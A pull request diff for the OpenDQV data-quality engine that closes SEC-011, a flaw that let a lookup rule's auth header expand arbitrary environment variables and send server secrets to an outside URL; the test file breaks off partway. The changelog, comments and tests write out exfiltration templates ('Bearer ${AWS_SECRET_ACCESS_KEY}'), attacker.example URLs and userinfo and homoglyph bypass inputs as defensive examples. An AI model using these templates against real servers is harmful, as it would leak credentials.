### PR TITLE
v2.3.28 — SEC-011: gate lookup_auth_header env-var substitution (secret exfil fix)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -268,6 +268,7 @@ jobs:
             --exclude "github\.com/user-attachments"
             --exclude "allereasy\.co\.uk"
             --exclude "linkedin\.com"
+            --exclude "montecarlodata\.com"
             '**/*.md'
           fail: true
         env:

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,47 @@
 
 All notable changes to OpenDQV are documented here.
 
+## [2.3.28] - 2026-07-20
+
+Security release closing a secret-exfiltration hole in the `lookup` rule's
+authenticated-endpoint support. Found in review, researched against industry
+prior art (dbt, GitHub Actions, Vault, OWASP), and adversarially red-teamed
+before merge. No change to rule-evaluation semantics or contract format.
+
+### Security
+
+- **SEC-011 — `lookup_auth_header` environment-variable exfiltration (CWE-526).**
+  The `lookup_auth_header` field expanded `${VAR}` references against the entire
+  process environment into an outbound `Authorization` header. Because a contract
+  author controls both the header template and the destination URL, a rule such
+  as `lookup_auth_header: "Bearer ${AWS_SECRET_ACCESS_KEY}"` pointed at a public
+  attacker URL exfiltrated any server secret (JWT signing key, database
+  credentials, cloud keys). The SEC-008 SSRF guard did not prevent this — the
+  destination is a legitimate public host; the leak is the credential in the
+  header, not the network path. Substitution is now gated by three layered,
+  fail-closed controls:
+  1. **Prefix allowlist** — only environment variables named with the
+     `OPENDQV_LOOKUP_` prefix are substitutable. A reference to any other name
+     fails the lookup (no silent empty string).
+  2. **`AUTH_MODE=open` posture** — under open auth (the shipped default, where
+     the `editor` role is a no-op) secret substitution is **disabled entirely**
+     unless the operator explicitly sets `OPENDQV_ALLOW_LOOKUP_SECRETS`.
+  3. **Egress domain allowlist** — a secret-bearing lookup may only target a host
+     listed in `OPENDQV_LOOKUP_EGRESS_ALLOWLIST` (empty ⇒ no authenticated lookup
+     permitted). The host is taken from the parsed URL hostname and IDNA-
+     canonicalised, defeating `user@evil.example` userinfo, case, trailing-dot
+     and punycode-homoglyph bypasses. Redirects are **not** followed for
+     secret-bearing lookups (a 3xx would forward the credential onward).
+
+  The failure is enforced at fetch time, so one malformed lookup rule fails only
+  its own validation (fail-closed) and never drops a contract's other rules.
+
+  **Breaking change:** existing contracts using a bare `${VAR}` auth header (e.g.
+  `"Bearer ${TOKEN}"`) now fail closed. Rename the environment variable to the
+  `OPENDQV_LOOKUP_` prefix (`OPENDQV_LOOKUP_TOKEN`), add the endpoint host to
+  `OPENDQV_LOOKUP_EGRESS_ALLOWLIST`, and — if running `AUTH_MODE=open` — set
+  `OPENDQV_ALLOW_LOOKUP_SECRETS`. Literal (non-`${}`) auth headers are unaffected.
+
 ## [2.3.27] - 2026-07-08
 
 Security hardening and correctness release from a first-hand discovery pass over

--- a/opendqv/config.py
+++ b/opendqv/config.py
@@ -80,6 +80,45 @@ IS_FEDERATED = bool(UPSTREAM_URL)
 # Auth convenience predicates — derived from AUTH_MODE, never set independently.
 IS_OPEN_MODE: bool = AUTH_MODE == "open"
 
+# ── SEC-011: lookup-rule auth-header secret substitution ───────────────────
+# The `lookup_auth_header` Rule field authenticates HTTP lookup endpoints and
+# supports ${VAR} substitution from the process environment. A contract author
+# (editor role — a NO-OP under AUTH_MODE=open) controls BOTH the destination URL
+# and the header template, so unrestricted substitution is a secret-exfiltration
+# primitive (CWE-526): `lookup_auth_header: "Bearer ${AWS_SECRET_ACCESS_KEY}"` +
+# a public attacker URL ships the secret out. The webhook/lookup SSRF guard
+# (SEC-008) does NOT stop this — the destination is a legitimate public host;
+# the leak is the credential in the header, not the network path.
+#
+# Three layered controls gate substitution — ALL must pass or the fetch is
+# refused fail-closed (see opendqv/core/validator.py):
+#   1. Only env vars named with LOOKUP_SECRET_ENV_PREFIX are substitutable.
+#      A reference to any other name hard-fails (no silent empty string).
+#   2. Under AUTH_MODE=open there is no trust boundary, so substitution is
+#      DISABLED entirely unless the operator sets OPENDQV_ALLOW_LOOKUP_SECRETS.
+#   3. A secret-bearing lookup may only target a host on LOOKUP_EGRESS_ALLOWLIST
+#      (fail-closed: empty allowlist ⇒ no authenticated lookup permitted), and
+#      redirects are NOT followed (a 3xx would forward the credential onward).
+LOOKUP_SECRET_ENV_PREFIX: str = "OPENDQV_LOOKUP_"
+
+
+def _parse_bool_env(name: str, default: str = "") -> bool:
+    return os.environ.get(name, default).strip().lower() in {"1", "true", "yes", "on"}
+
+
+ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE: bool = _parse_bool_env("OPENDQV_ALLOW_LOOKUP_SECRETS")
+
+# Comma-separated host allowlist for secret-bearing lookup URLs. Hosts are
+# lowercased and trailing dots stripped at load; IDNA canonicalisation and the
+# strict comparison happen in the validator against the incoming URL's parsed
+# hostname (defeats userinfo-@, case, trailing-dot and punycode-homoglyph
+# bypasses). Empty ⇒ fail-closed (no authenticated lookup permitted).
+LOOKUP_EGRESS_ALLOWLIST: frozenset = frozenset(
+    h.strip().lower().rstrip(".")
+    for h in os.environ.get("OPENDQV_LOOKUP_EGRESS_ALLOWLIST", "").split(",")
+    if h.strip()
+)
+
 # Rate-limit sentinel values — "off", "0", or "disabled" disable per-IP limiting.
 _RATE_LIMIT_OFF_VALUES: frozenset = frozenset({"off", "0", "disabled"})
 

--- a/opendqv/core/rule_parser.py
+++ b/opendqv/core/rule_parser.py
@@ -32,7 +32,7 @@ Supported rule types:
                       lookup_file: /path/to/ids.csv          + lookup_field: column_name (CSV)
                       lookup_file: https://host/endpoint     (HTTP GET — JSON array or newline text)
                       cache_ttl: 300                         (HTTP cache TTL seconds, default 300)
-                      lookup_auth_header: "Bearer ${TOKEN}"  (authenticated HTTP endpoints)
+                      lookup_auth_header: "Bearer ${OPENDQV_LOOKUP_TOKEN}"  (auth'd HTTP; SEC-011: only OPENDQV_LOOKUP_* env vars, allowlisted host)
                       set all_of: true to validate each element in a list field
   checksum          — validates identifier check digits
                       (IBAN, GTIN/GS1, NHS, ISIN, LEI, VIN, ISRC, CPF)
@@ -220,8 +220,13 @@ class Rule(BaseModel):
     geo_min_lon: Optional[float] = None      # minimum longitude (-180 to 180)
     geo_max_lon: Optional[float] = None      # maximum longitude (-180 to 180)
 
-    # HTTP lookup auth — Bearer token for authenticated endpoints
-    # e.g. "Bearer ${OFAC_API_KEY}" — env var substitution performed at runtime
+    # HTTP lookup auth — Bearer token for authenticated endpoints.
+    # e.g. "Bearer ${OPENDQV_LOOKUP_OFAC_API_KEY}" — env var substitution at
+    # runtime. SEC-011 (see validator._resolve_lookup_auth_header): only env
+    # vars named with the OPENDQV_LOOKUP_ prefix are substitutable, the
+    # destination host must be on OPENDQV_LOOKUP_EGRESS_ALLOWLIST, and under
+    # AUTH_MODE=open substitution is disabled unless OPENDQV_ALLOW_LOOKUP_SECRETS
+    # is set. Any violation fails the lookup closed.
     lookup_auth_header: Optional[str] = None
 
     # All_of for list lookup — type: lookup with all_of: true

--- a/opendqv/core/validator.py
+++ b/opendqv/core/validator.py
@@ -16,6 +16,7 @@ import threading
 import time
 import urllib.request
 import urllib.error
+import urllib.parse
 from datetime import datetime, timezone
 from collections import defaultdict
 from functools import lru_cache
@@ -1069,6 +1070,139 @@ class _SSRFSafeRedirectHandler(urllib.request.HTTPRedirectHandler):
 _ssrf_safe_opener = urllib.request.build_opener(_SSRFSafeRedirectHandler)
 
 
+class LookupAuthPolicyError(ValueError):
+    """SEC-011: a lookup auth-header ${VAR} substitution violated policy.
+
+    A subclass of ValueError so the single-record lookup handlers (which already
+    catch ValueError and fail closed → error_message) treat it as a load failure.
+    The batch handler catches it explicitly to fail closed too, distinct from the
+    transient-infra errors it otherwise skips fail-open.
+    """
+
+
+class _NoRedirectHandler(urllib.request.HTTPRedirectHandler):
+    """SEC-011 / OWASP: refuse redirects for credential-bearing lookups.
+
+    urllib re-sends the Authorization header across 3xx redirects, so an
+    allowlisted host that 302s to any other host would forward the resolved
+    secret onward, defeating the egress allowlist. For secret-bearing fetches we
+    do not follow redirects at all — a legitimate auth lookup returns 200 with
+    its list, not a redirect. Fail closed.
+    """
+
+    def redirect_request(self, req, fp, code, msg, headers, newurl):
+        raise urllib.error.HTTPError(
+            req.full_url, code,
+            "Redirect not permitted for an authenticated (secret-bearing) lookup",
+            headers, fp,
+        )
+
+
+_no_redirect_opener = urllib.request.build_opener(_NoRedirectHandler)
+
+# SEC-011: matches a single ${VAR} reference. Applied once (re.sub does not
+# rescan its own replacements), so a resolved value cannot be re-expanded.
+_LOOKUP_SECRET_REF_RE = re.compile(r'\$\{([^}]+)\}')
+
+# Generic denial message. Deliberately does NOT echo the env var value, nor
+# distinguish "var unset" from "var disallowed" — avoids an env-var existence
+# oracle. The three policy reasons below are separate strings because each names
+# operator-controlled POLICY (open-mode opt-in, name prefix, host allowlist),
+# never the secret itself or whether any particular var is set.
+_LOOKUP_SECRET_OPEN_MODE_MSG = (
+    "SEC-011: lookup auth-header secret substitution is disabled under "
+    "AUTH_MODE=open; set OPENDQV_ALLOW_LOOKUP_SECRETS to opt in"
+)
+_LOOKUP_SECRET_PREFIX_MSG = (
+    "SEC-011: lookup auth-header may only reference env vars named with the "
+    "OPENDQV_LOOKUP_ prefix"
+)
+_LOOKUP_SECRET_HOST_MSG = (
+    "SEC-011: secret-bearing lookup URL host is not on "
+    "OPENDQV_LOOKUP_EGRESS_ALLOWLIST (fail-closed)"
+)
+
+
+def _canonical_host(hostname: str) -> Optional[str]:
+    """Canonicalise a hostname for strict allowlist comparison.
+
+    Lowercases, strips a trailing dot, and IDNA-encodes so a Unicode homoglyph
+    (e.g. Cyrillic 'а') or punycode form cannot masquerade as an ASCII host.
+    Returns None if the host cannot be canonicalised (⇒ caller rejects).
+    """
+    if not hostname:
+        return None
+    host = hostname.strip().lower().rstrip(".")
+    if not host:
+        return None
+    try:
+        # str.encode("idna") rejects empty labels / over-length / bad chars.
+        return host.encode("idna").decode("ascii").lower()
+    except Exception:
+        return None
+
+
+def _assert_lookup_host_allowed(url: str) -> None:
+    """SEC-011 control #3: the URL host must be on the egress allowlist.
+
+    Uses urlparse().hostname (so userinfo `user@evil.example` resolves to the
+    real host, not the userinfo) and canonicalises both sides. Fail-closed:
+    an empty allowlist rejects every secret-bearing lookup.
+    """
+    import opendqv.config as config
+
+    parsed = urllib.parse.urlparse(url)
+    # Defense-in-depth: reject userinfo (user@host). urllib's connect path
+    # (http.client via the legacy host split) parses the netloc differently from
+    # urlparse().hostname, so a "allowed.example@evil.example" form could diverge
+    # between the host we check and the host that is dialled. Refuse it outright
+    # rather than rely on the divergent form failing DNS.
+    if parsed.username is not None or "@" in (parsed.netloc or ""):
+        raise LookupAuthPolicyError(_LOOKUP_SECRET_HOST_MSG)
+
+    allow = {_canonical_host(h) for h in config.LOOKUP_EGRESS_ALLOWLIST}
+    allow.discard(None)
+    host = _canonical_host(parsed.hostname or "")
+    if host is None or host not in allow:
+        raise LookupAuthPolicyError(_LOOKUP_SECRET_HOST_MSG)
+
+
+def _resolve_lookup_auth_header(auth_header: Optional[str], url: str):
+    """SEC-011: resolve a lookup auth header, enforcing the three-layer policy.
+
+    Returns (resolved_header_or_None, is_secret_bearing). Raises
+    LookupAuthPolicyError (fail-closed) on any policy violation. A header with no
+    ${VAR} reference is a literal credential known to the contract author already
+    — it carries no server secret, so it is returned unguarded (the SSRF guard
+    still applies to the URL upstream).
+    """
+    if not auth_header:
+        return None, False
+
+    refs = _LOOKUP_SECRET_REF_RE.findall(auth_header)
+    if not refs:
+        return auth_header, False
+
+    import opendqv.config as config
+
+    # Control #2 — no trust boundary under AUTH_MODE=open.
+    if config.IS_OPEN_MODE and not config.ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE:
+        raise LookupAuthPolicyError(_LOOKUP_SECRET_OPEN_MODE_MSG)
+
+    # Control #1 — only OPENDQV_LOOKUP_-prefixed names may be substituted.
+    for name in refs:
+        if not name.startswith(config.LOOKUP_SECRET_ENV_PREFIX):
+            raise LookupAuthPolicyError(_LOOKUP_SECRET_PREFIX_MSG)
+
+    # Control #3 — destination host must be explicitly allowlisted.
+    _assert_lookup_host_allowed(url)
+
+    resolved = _LOOKUP_SECRET_REF_RE.sub(
+        lambda m: os.environ.get(m.group(1), ""), auth_header
+    )
+    return resolved, True
+
+
 def _load_http_lookup_set(url: str, lookup_field: str, cache_ttl: int, auth_header: Optional[str] = None) -> frozenset:
     """
     Fetch a set of valid values from an HTTP endpoint. Results are cached for cache_ttl seconds.
@@ -1101,19 +1235,24 @@ def _load_http_lookup_set(url: str, lookup_field: str, cache_ttl: int, auth_head
     from .webhooks import assert_url_public
     assert_url_public(url, label="Lookup URL")
 
+    # SEC-011: resolve + policy-gate the auth header BEFORE any network I/O.
+    # Raises LookupAuthPolicyError (fail-closed) if substitution is disallowed.
+    # Runs on every cache miss so a policy-violating config never populates the
+    # cache and never fetches. A secret-bearing header additionally forbids
+    # redirects (the credential must not be forwarded to a 3xx target).
+    resolved_auth, is_secret_bearing = _resolve_lookup_auth_header(auth_header, url)
+
     # Fetch outside the lock to avoid holding it during network I/O
     try:
         headers = {"User-Agent": "OpenDQV-lookup/1.0"}
-        if auth_header:
-            import os
-            import re as _re
-            auth_value = _re.sub(r'\$\{([^}]+)\}', lambda m: os.environ.get(m.group(1), ""), auth_header)
-            headers["Authorization"] = auth_value
+        if resolved_auth is not None:
+            headers["Authorization"] = resolved_auth
         req = urllib.request.Request(url, headers=headers)
         _MAX_LOOKUP_BYTES = 10_485_760  # 10 MB
-        # Use the SSRF-safe opener so redirect targets are re-validated (SEC-008)
-        # rather than followed blindly to an internal host.
-        with _ssrf_safe_opener.open(req, timeout=10) as resp:
+        # Secret-bearing lookups: no-redirect opener (OWASP — don't forward the
+        # credential). Otherwise the SSRF-safe opener re-validates each hop.
+        opener = _no_redirect_opener if is_secret_bearing else _ssrf_safe_opener
+        with opener.open(req, timeout=10) as resp:
             content_type = resp.headers.get("Content-Type", "")
             body = resp.read(_MAX_LOOKUP_BYTES + 1)
             if len(body) > _MAX_LOOKUP_BYTES:
@@ -1580,6 +1719,16 @@ def _batch_check_rule(con, df: pd.DataFrame, rule: Rule, failing_type_mismatches
                         failing.add(idx)
                 elif str(val) not in valid_values:
                     failing.add(idx)
+        except LookupAuthPolicyError as exc:
+            # SEC-011: a policy violation is not a transient infra error — fail
+            # CLOSED (unlike the infra handler below). Every record subject to
+            # this rule fails, mirroring the single-record path's error_message.
+            logger.error("lookup rule '%s' blocked by SEC-011 policy: %s", rule.name, exc)
+            for idx in range(len(df)):
+                val = df[field].iloc[idx]
+                if val is None or (isinstance(val, float) and pd.isna(val)):
+                    continue
+                failing.add(idx)
         except (FileNotFoundError, KeyError, OSError, RuntimeError) as exc:
             logger.warning("lookup rule '%s' skipped (infrastructure error, not failing batch): %s", rule.name, exc)
 

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "opendqv"
-version = "2.3.27"
+version = "2.3.28"
 description = "OpenDQV Core — open-source, contract-driven data quality validation engine for data pipelines and API boundaries"
 authors = ["Sunny Sharma"]
 license = "MIT"

--- a/tests/test_v2_3_28_lookup_auth_sec011.py
+++ b/tests/test_v2_3_28_lookup_auth_sec011.py
@@ -1,0 +1,361 @@
+"""SEC-011 — lookup_auth_header env-var secret-exfiltration guard.
+
+Regression suite for the v2.3.28 fix. The vulnerability: `lookup_auth_header`
+supported `${VAR}` substitution over the entire process environment, and a
+contract author controls both the header template and the destination URL, so
+`lookup_auth_header: "Bearer ${AWS_SECRET_ACCESS_KEY}"` + a public attacker URL
+exfiltrated any server secret (CWE-526). The SEC-008 SSRF guard did not stop it
+— the destination is a legitimate public host.
+
+Fix: three layered controls in validator._resolve_lookup_auth_header —
+  1. only OPENDQV_LOOKUP_-prefixed env vars are substitutable (else hard-fail),
+  2. under AUTH_MODE=open substitution is off unless OPENDQV_ALLOW_LOOKUP_SECRETS,
+  3. a secret-bearing lookup host must be on OPENDQV_LOOKUP_EGRESS_ALLOWLIST
+     (fail-closed) and redirects are not followed.
+
+Every case Sonnet's pre-merge red-team raised has a test here.
+"""
+
+from contextlib import ExitStack
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+import opendqv.config as config
+from opendqv.core.validator import (
+    LookupAuthPolicyError,
+    _resolve_lookup_auth_header,
+    _canonical_host,
+    _load_http_lookup_set,
+    _http_lookup_cache,
+)
+
+
+# ── fixtures / helpers ─────────────────────────────────────────────────────
+
+@pytest.fixture(autouse=True)
+def _clear_cache():
+    _http_lookup_cache.clear()
+    yield
+    _http_lookup_cache.clear()
+
+
+@pytest.fixture
+def token_mode(monkeypatch):
+    """AUTH_MODE=token (a real trust boundary). Open-mode control #2 is inert."""
+    monkeypatch.setattr(config, "IS_OPEN_MODE", False)
+    monkeypatch.setattr(config, "ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE", False)
+
+
+@pytest.fixture
+def allow_api_example(monkeypatch):
+    monkeypatch.setattr(config, "LOOKUP_EGRESS_ALLOWLIST", frozenset({"api.example"}))
+
+
+def _dns_patch():
+    import socket
+    return patch("socket.getaddrinfo", return_value=[
+        (socket.AF_INET, socket.SOCK_STREAM, 0, "", ("93.184.216.34", 0))
+    ])
+
+
+# ── control #1 — prefix allowlist ──────────────────────────────────────────
+
+class TestPrefixAllowlist:
+    def test_nonprefixed_var_hardfails(self, token_mode, allow_api_example, monkeypatch):
+        monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "super-secret")
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header("Bearer ${AWS_SECRET_ACCESS_KEY}",
+                                        "https://api.example/list")
+
+    def test_prefixed_var_resolves_on_allowlisted_host(self, token_mode,
+                                                        allow_api_example, monkeypatch):
+        monkeypatch.setenv("OPENDQV_LOOKUP_OFAC", "ofac-key")
+        resolved, secret_bearing = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_OFAC}", "https://api.example/list")
+        assert resolved == "Bearer ofac-key"
+        assert secret_bearing is True
+
+    def test_literal_header_is_unguarded(self, monkeypatch):
+        # No ${...} → no server secret involved → returned as-is, not secret-bearing.
+        monkeypatch.setattr(config, "LOOKUP_EGRESS_ALLOWLIST", frozenset())
+        resolved, secret_bearing = _resolve_lookup_auth_header(
+            "Bearer literal-token", "https://anywhere.example")
+        assert resolved == "Bearer literal-token"
+        assert secret_bearing is False
+
+    def test_mixed_refs_one_bad_hardfails(self, token_mode, allow_api_example, monkeypatch):
+        monkeypatch.setenv("OPENDQV_LOOKUP_A", "a")
+        monkeypatch.setenv("SECRET_KEY", "b")
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "X ${OPENDQV_LOOKUP_A} ${SECRET_KEY}", "https://api.example")
+
+    def test_no_recursive_expansion(self, token_mode, allow_api_example, monkeypatch):
+        # A resolved value that itself looks like ${...} must NOT be re-expanded.
+        monkeypatch.setenv("OPENDQV_LOOKUP_X", "${SECRET_KEY}")
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        resolved, _ = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_X}", "https://api.example")
+        assert resolved == "Bearer ${SECRET_KEY}"
+        assert "leaked" not in resolved
+
+    def test_nested_brace_ref_not_bypassable(self, token_mode, allow_api_example, monkeypatch):
+        # ${OPENDQV_LOOKUP_${INJ}} — the inner name captured is not prefix-clean.
+        monkeypatch.setenv("INJ", "SECRET_KEY")
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        # The captured name is "OPENDQV_LOOKUP_${INJ" — still resolves via env.get
+        # (empty), and the residual "}" stays literal. It must NOT leak SECRET_KEY.
+        resolved, _ = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_${INJ}}", "https://api.example")
+        assert "leaked" not in resolved
+
+
+# ── control #2 — AUTH_MODE=open posture ─────────────────────────────────────
+
+class TestOpenModePosture:
+    def test_open_mode_disables_substitution(self, monkeypatch, allow_api_example):
+        monkeypatch.setattr(config, "IS_OPEN_MODE", True)
+        monkeypatch.setattr(config, "ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE", False)
+        monkeypatch.setenv("OPENDQV_LOOKUP_OFAC", "ofac-key")
+        # Even a well-formed, allowlisted, prefixed ref is refused in open mode.
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "Bearer ${OPENDQV_LOOKUP_OFAC}", "https://api.example/list")
+
+    def test_open_mode_optin_reenables(self, monkeypatch, allow_api_example):
+        monkeypatch.setattr(config, "IS_OPEN_MODE", True)
+        monkeypatch.setattr(config, "ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE", True)
+        monkeypatch.setenv("OPENDQV_LOOKUP_OFAC", "ofac-key")
+        resolved, secret_bearing = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_OFAC}", "https://api.example/list")
+        assert resolved == "Bearer ofac-key"
+        assert secret_bearing is True
+
+    def test_open_mode_literal_header_still_allowed(self, monkeypatch):
+        # A literal (non-secret) header is unaffected by the open-mode gate.
+        monkeypatch.setattr(config, "IS_OPEN_MODE", True)
+        monkeypatch.setattr(config, "ALLOW_LOOKUP_SECRETS_IN_OPEN_MODE", False)
+        resolved, secret_bearing = _resolve_lookup_auth_header(
+            "Bearer literal", "https://anywhere.example")
+        assert resolved == "Bearer literal"
+        assert secret_bearing is False
+
+
+# ── control #3 — egress allowlist (the load-bearing control) ────────────────
+
+class TestEgressAllowlist:
+    def test_empty_allowlist_fails_closed(self, token_mode, monkeypatch):
+        monkeypatch.setattr(config, "LOOKUP_EGRESS_ALLOWLIST", frozenset())
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "Bearer ${OPENDQV_LOOKUP_K}", "https://api.example")
+
+    def test_allowed_secret_to_nonallowlisted_host_blocked(self, token_mode,
+                                                            allow_api_example, monkeypatch):
+        # THE load-bearing case: prefix is fine, but the attacker's own host is
+        # not allowlisted, so the legitimate OFAC key cannot be shipped out.
+        monkeypatch.setenv("OPENDQV_LOOKUP_OFAC", "ofac-key")
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "Bearer ${OPENDQV_LOOKUP_OFAC}", "https://attacker.example/collect")
+
+    def test_userinfo_at_bypass_blocked(self, token_mode, allow_api_example, monkeypatch):
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        # host is attacker.example, not api.example — userinfo must not fool it.
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "Bearer ${OPENDQV_LOOKUP_K}", "https://api.example@attacker.example/")
+
+    def test_trailing_dot_matches(self, token_mode, allow_api_example, monkeypatch):
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        resolved, _ = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_K}", "https://api.example./list")
+        assert resolved == "Bearer k"
+
+    def test_case_insensitive_host_matches(self, token_mode, allow_api_example, monkeypatch):
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        resolved, _ = _resolve_lookup_auth_header(
+            "Bearer ${OPENDQV_LOOKUP_K}", "https://API.Example/list")
+        assert resolved == "Bearer k"
+
+    def test_homogloph_host_blocked(self, token_mode, allow_api_example, monkeypatch):
+        # Cyrillic 'а' in "аpi.example" IDNA-encodes to xn--… — must not match.
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        with pytest.raises(LookupAuthPolicyError):
+            _resolve_lookup_auth_header(
+                "Bearer ${OPENDQV_LOOKUP_K}", "https://аpi.example/list")
+
+    def test_canonical_host_helper(self):
+        assert _canonical_host("API.Example.") == "api.example"
+        assert _canonical_host("") is None
+        assert _canonical_host("аllowed.example") == "xn--llowed-2nf.example"
+
+
+# ── redirect handling — OWASP: don't forward the credential ─────────────────
+
+class TestNoRedirectForSecretBearing:
+    def test_secret_bearing_uses_no_redirect_opener(self, token_mode,
+                                                     allow_api_example, monkeypatch):
+        import json
+        monkeypatch.setenv("OPENDQV_LOOKUP_K", "k")
+        mock_resp = MagicMock()
+        mock_resp.headers = {"Content-Type": "application/json"}
+        mock_resp.read.return_value = json.dumps(["A"]).encode()
+        mock_resp.__enter__ = lambda s: s
+        mock_resp.__exit__ = MagicMock(return_value=False)
+
+        with ExitStack() as stack:
+            stack.enter_context(_dns_patch())
+            no_redirect = stack.enter_context(
+                patch("opendqv.core.validator._no_redirect_opener.open",
+                      return_value=mock_resp))
+            ssrf = stack.enter_context(
+                patch("opendqv.core.validator._ssrf_safe_opener.open",
+                      return_value=mock_resp))
+            result = _load_http_lookup_set(
+                "https://api.example/list", "", 60,
+                auth_header="Bearer ${OPENDQV_LOOKUP_K}")
+        assert result == frozenset({"A"})
+        assert no_redirect.called, "secret-bearing lookup must use the no-redirect opener"
+        assert not ssrf.called, "secret-bearing lookup must NOT use the redirect-following opener"
+
+    def test_no_redirect_handler_raises_on_3xx(self):
+        # OWASP: a credential-bearing request must not follow a redirect. The
+        # handler raises (fail-closed) rather than returning None (which urllib
+        # would treat as "serve the 3xx body").
+        import io
+        import urllib.error
+        from opendqv.core.validator import _NoRedirectHandler
+        handler = _NoRedirectHandler()
+        req = MagicMock()
+        req.full_url = "https://api.example/list"
+        with pytest.raises(urllib.error.HTTPError):
+            handler.redirect_request(
+                req, io.BytesIO(b""), 302, "Found", {},
+                "https://attacker.example/collect")
+
+    def test_nonauth_lookup_uses_ssrf_opener(self, token_mode, monkeypatch):
+        import json
+        mock_resp = MagicMock()
+        mock_resp.headers = {"Content-Type": "application/json"}
+        mock_resp.read.return_value = json.dumps(["A"]).encode()
+        mock_resp.__enter__ = lambda s: s
+        mock_resp.__exit__ = MagicMock(return_value=False)
+
+        with ExitStack() as stack:
+            stack.enter_context(_dns_patch())
+            no_redirect = stack.enter_context(
+                patch("opendqv.core.validator._no_redirect_opener.open",
+                      return_value=mock_resp))
+            ssrf = stack.enter_context(
+                patch("opendqv.core.validator._ssrf_safe_opener.open",
+                      return_value=mock_resp))
+            _load_http_lookup_set("https://api.example/list", "", 60, auth_header=None)
+        assert ssrf.called
+        assert not no_redirect.called
+
+
+# ── failure boundary — a policy violation never populates the cache ─────────
+
+class TestFailureBoundary:
+    def test_policy_violation_does_not_cache_or_fetch(self, token_mode,
+                                                      allow_api_example, monkeypatch):
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        with ExitStack() as stack:
+            stack.enter_context(_dns_patch())
+            no_redirect = stack.enter_context(
+                patch("opendqv.core.validator._no_redirect_opener.open"))
+            ssrf = stack.enter_context(
+                patch("opendqv.core.validator._ssrf_safe_opener.open"))
+            with pytest.raises(LookupAuthPolicyError):
+                _load_http_lookup_set(
+                    "https://api.example/list", "", 60,
+                    auth_header="Bearer ${SECRET_KEY}")
+        assert not no_redirect.called and not ssrf.called, "no fetch on policy violation"
+        assert len(_http_lookup_cache) == 0, "policy-violating config must never cache"
+
+    def test_conditional_lookup_fails_closed(self, token_mode, allow_api_example, monkeypatch):
+        # _check_conditional_lookup shares _load_http_lookup_set — verify the
+        # conditional handler also fails closed on a SEC-011 policy violation.
+        from opendqv.core.validator import _check_conditional_lookup
+        from opendqv.core.rule_parser import Rule
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        rule = Rule(name="r", type="conditional_lookup", field="x",
+                    lookup_file="https://api.example/list",
+                    lookup_auth_header="Bearer ${SECRET_KEY}",
+                    error_message="blocked")
+        assert _check_conditional_lookup("present-value", rule) == "blocked"
+
+    def test_policy_error_never_logs_secret(self, token_mode, allow_api_example,
+                                            monkeypatch, caplog):
+        # The resolved secret and the raw template must never reach the logs.
+        import logging
+        monkeypatch.setenv("SECRET_KEY", "leaked-secret-value")
+        with caplog.at_level(logging.DEBUG):
+            with pytest.raises(LookupAuthPolicyError) as exc:
+                _resolve_lookup_auth_header(
+                    "Bearer ${SECRET_KEY}", "https://api.example/list")
+        assert "leaked-secret-value" not in caplog.text
+        assert "leaked-secret-value" not in str(exc.value)
+
+    def test_multi_rule_cache_isolation(self, token_mode, allow_api_example, monkeypatch):
+        # Two rules, same URL, different auth headers must not share a cache
+        # entry — the cache key carries the raw auth-header template.
+        import json
+        monkeypatch.setenv("OPENDQV_LOOKUP_A", "aaa")
+        monkeypatch.setenv("OPENDQV_LOOKUP_B", "bbb")
+        seen_auth = []
+        mock_resp = MagicMock()
+        mock_resp.headers = {"Content-Type": "application/json"}
+        mock_resp.read.return_value = json.dumps(["X"]).encode()
+        mock_resp.__enter__ = lambda s: s
+        mock_resp.__exit__ = MagicMock(return_value=False)
+
+        def _capture(req, timeout=10):
+            seen_auth.append(req.get_header("Authorization"))
+            return mock_resp
+
+        with ExitStack() as stack:
+            stack.enter_context(_dns_patch())
+            stack.enter_context(
+                patch("opendqv.core.validator._no_redirect_opener.open", side_effect=_capture))
+            _load_http_lookup_set("https://api.example/list", "", 300,
+                                  auth_header="Bearer ${OPENDQV_LOOKUP_A}")
+            _load_http_lookup_set("https://api.example/list", "", 300,
+                                  auth_header="Bearer ${OPENDQV_LOOKUP_B}")
+        # Both fetched (no cross-rule cache hit), each with its own resolved secret.
+        assert seen_auth == ["Bearer aaa", "Bearer bbb"]
+
+    def test_single_record_lookup_fails_closed(self, token_mode, allow_api_example, monkeypatch):
+        # End-to-end: a bad-prefix auth header marks the record invalid, and does
+        # NOT crash — the _check_lookup handler catches ValueError → error_message.
+        from opendqv.core.validator import validate_record
+        from opendqv.core.rule_parser import Rule
+        monkeypatch.setenv("SECRET_KEY", "leaked")
+        rules = [Rule(name="r", type="lookup", field="x",
+                      lookup_file="https://api.example/list",
